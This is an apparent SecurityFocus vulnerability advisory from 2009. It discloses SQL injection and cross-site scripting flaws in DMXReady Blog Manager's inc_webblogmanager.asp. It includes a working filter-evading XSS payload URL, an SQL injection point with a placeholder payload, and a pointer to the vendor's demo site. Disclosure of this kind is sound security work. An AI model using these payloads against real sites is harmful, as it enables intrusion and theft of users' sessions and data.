DMXReady Blog Manager (SQL/XSS) Jan 16 2009 09:33AM
pouya s3rver gmail com
#########################################################
---------------------------------------------------------
Portal Name: DMXReady Blog Manager (SQL/XSS)
Vendor : http://www.galaxyscripts.com
Author : Pouya_Server , Pouya.s3rver (at) Gmail (dot) com [email concealed]
Aria-Security.Net
Vulnerability : (SQL/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=
[SQL]&action=view
----------

[XSS]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%
20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer
---------------------------------
Demo:
http://www.demo.dmxready.com/applications/WebBlogManager/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus